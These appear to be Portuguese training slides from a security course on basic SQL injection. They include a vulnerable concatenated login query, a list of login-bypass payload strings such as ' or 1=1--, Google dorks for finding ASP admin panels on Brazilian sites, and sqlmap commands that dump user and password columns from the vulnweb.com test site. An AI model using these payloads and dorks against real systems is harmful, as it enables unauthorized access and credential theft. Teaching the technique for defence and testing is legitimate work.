O que temos pra hoje?

Formao: Analise em Segurana da Informao SQL Injection Bsico

Temas de Hoje:

SQL Injection Bsico

Conceito
Entendendo as Strings
Utilizando Dorks
Exemplo Prtico
Exemplos de Dorks
Exemplos de Strings
SQL Injection Intermedirio
Conceito
Diferena entre SQL Injection e Blind Sql Injection
Coletando Bancos de Dados
Coletando Tabelas e Colunas
Coletando senhas
Coletando informaes sobre o Servidor

SQL Injection Bsico

Formao: Analise em Segurana da Informao SQL Injection Bsico

SQL Injection
Formao: Analise em Segurana da Informao SQL Injection Bsico

A Injeo de SQL, mais conhecida atravs do termo americano SQL Injection,

um tipo de ameaa de segurana que se aproveita de falhas em sistemas que
interagem com bases de dados via SQL. A injeo de SQL ocorre quando o
atacante consegue inserir uma srie de instrues SQL dentro de uma consulta
(query) atravs da manipulao das entradas de dados de uma aplicao

Sql Injection Bsico

Formao: Analise em Segurana da Informao SQL Injection Bsico

Tambm considerado SQL Injection o fato de enganar o form com uma falha de
programao.

Vamos ao exemplo de um cdigo de validao de usurio:

var query = "SELECT * FROM usuarios WHERE login = '" + login +"' AND senha = '" + senha + "'" ;
SELECT * FROM usuarios WHERE login = ' ' ' AND password = '[password]' ;
Vamos supor que adicionamos aos campos de usurio e senha o seguinte item.

' or 1=1 -SELECT * FROM usuarios WHERE login = ' ' or 1=1- - ' AND senha = '[senha]';

Sql Injection Bsico - Exemplo

Formao: Analise em Segurana da Informao SQL Injection Bsico

DORK
inurl:"adm/index.asp" site:com.br

Sql Injection Bsico - Dorks

Formao: Analise em Segurana da Informao SQL Injection Bsico

Outras Dorks:
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp

Sql Injection Bsico - Strings

Formao: Analise em Segurana da Informao SQL Injection Bsico

Variao de Strings:
admin'-' or 0=0 -" or 0=0 -or 0=0 -' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1-" or 1=1-or 1=1--

' or a=a-" or "a"="a

') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 -hi' or 1=1 -hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

SQL Injection x Blind SQL

Formao: Analise em Segurana da Informao SQL Injection Bsico

A Injeo de SQL, mais conhecida atravs do termo americano SQL Injection,

um tipo de ameaa de segurana que se aproveita de falhas em sistemas que
interagem com bases de dados via SQL. A injeo de SQL ocorre quando o
atacante consegue inserir uma srie de instrues SQL dentro de uma consulta
(query) atravs da manipulao das entradas de dados de uma aplicao

SQL Injection x Blind SQL

Formao: Analise em Segurana da Informao SQL Injection Bsico

Qual a diferena entre SQL Injection e Blind Sql Injection?

SQLMap
Formao: Analise em Segurana da Informao SQL Injection Bsico

SQLMAP

String: sqlmap --url "http://testphp.vulnweb.com/listproducts.php?cat=1" [opes]

SQLMap
Formao: Analise em Segurana da Informao SQL Injection Bsico

Sqlmap uma ferramenta open source para penetration test que automatiza o
processo de deteco e exploiting de vulnerabilidades a Sqli Injection, escrita
em python e tem suporte tanto GNU linux ou windows.
O sqlmap alm de oferecer as funes para detectar e explorar as
vulnerabilidades a SQLI, ele consegue tambm tentar dominar o sistema de
banco de dados se for possivel.

SQLMap
Formao: Analise em Segurana da Informao SQL Injection Bsico

--help
Mostra as opes do SQLMAP

--current-db
Apresenta o banco de dados atual
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-db
--banner
Pega o Banner do DBMS
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -b
--dbs
Lista os bancos de dados do DBMS
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs

DBMS: Database Management System, sistema gerenciador de banco de dados

SQLMap
Formao: Analise em Segurana da Informao SQL Injection Bsico

--tables
Apresenta as tabelas do banco selecionado
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1"
-D acuart --tables
--columns
Apresenta as colunas da tabela selecionada
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1"
-D acuart -T users --columns
--dump
Extrai as informaes da colunas selecionadas
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1"
-D acuart -T users -C 'uname,pass' --dump

SQLMap
Formao: Analise em Segurana da Informao SQL Injection Bsico

--current-user
Apresenta o usurio ao qual a pgina est usando para se conectar ao banco
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-user
--is-dba
Verifica se o usurio atual administrador do Banco
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --is-dba
--users
Enumera todos os usurios
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --users
--search
Varre o banco atrs do que voc procura, pode ser um banco, tabela ou coluna
Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --search C pass

printf ("\Chega por hoje\n");

Formao: Analise em Segurana da Informao SQL Injection Bsico

www.eSecurity.com.br

E-mail: alan.sanches@esecurity.com.br

Twitter: @esecuritybr e @desafiohacker

Skype: desafiohacker

Fanpage: www.facebook.com/academiahacker